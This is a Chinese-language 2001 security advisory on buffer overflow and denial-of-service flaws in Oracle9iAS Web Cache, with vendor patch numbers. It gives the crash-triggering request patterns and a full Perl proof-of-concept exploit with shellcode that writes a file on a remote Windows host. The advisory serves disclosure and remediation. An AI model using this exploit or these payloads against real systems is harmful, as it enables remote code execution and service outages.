Oracle9iAS Web Cache存在多个DoS和缓冲溢出发布时间:2001-10-19 更新时间:2001-10-19 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Oracle9iAS Web Cache/2.0.0.1.0详细描述 简单的请求可以导致拒绝服务攻击或者缓冲溢出,Oracle9iAS Web Cache提供 四个WEB服务,默认运行如下: Port 1100 = Incoming web cache proxy. Port 4000 = Administrative interface. Port 4001 = Web XML invalidation port. Port 4002 = Statistics port. 1)缓冲溢出: 当请求包含/ + 'A' x 3095 + 'N' x 4的信息时,可以导致如下情况: <....snip> State Dump for Thread Id 0x104 eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041 esi=01baac86 edi=0040deb6 eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0 cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000216 <snip....> 2)拒绝服务攻击 通过发送超过3570字符的字符串,可以导致堆栈破坏: 'GET /<3571 x A> HTTP/1.0' 下面三种可以导致CPU利用率达100%: a:发送3094个字符。 b:发送在HTTP头中包含4000个字符的请求: 'GET / HTTP/1.0' 'User-Agent: <4000 x A>' c:发送如下请求(此影响webcache admin接口) 测试代码 ######################################################################### # # Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0 # Creates the file c:\defcom.iyd # By andreas@defcom.com (C)2001 # # # Since we do not control the space after what ESP points to, I was lazy # and did a direct buffer jump. So, if it does not work, try changing # the return address(start of buffer in mem) to one that fits your system. # The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2). # /andreas # ######################################################################### $ARGC=@ARGV; if ($ARGC !=1) { print "Usage: $0 <host>\n"; print "Example: $0 127.0.0.1\n"; exit; } use Socket; my($remote,$port,$iaddr,$paddr,$proto); $remote=$ARGV[0]; $port = "1100"; # default port for the web cache $iaddr = inet_aton($remote) or die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) or die "Error: $!"; $proto = getprotobyname('tcp') or die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!"; connect(SOCK, $paddr) or die "Error: $!"; $sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9"; $sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59"; $sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4"; $sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66"; $sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99"; $msg = "GET " . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n"; print $msg; send(SOCK, $msg, 0) or die "Cannot send query: $!"; sleep(1); close(SOCK); exit; 解决方案 下载补丁程序: http://metalink.oracle.com NT/WIN2K: Patch number 2044682 SUN Sparc Solaris: Patch number 2042106 HP-UX: Patch number 2043908 Linux: Patch number 2043924 Compaq Tru64 Unix: Patch number 2043921 IBM AIX: Patch number 2043917 相关信息 George Hedfors <george.hedfors@defcom.com> Andreas Junestam <andreas.junestam@defcom.com> 参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0134.html |
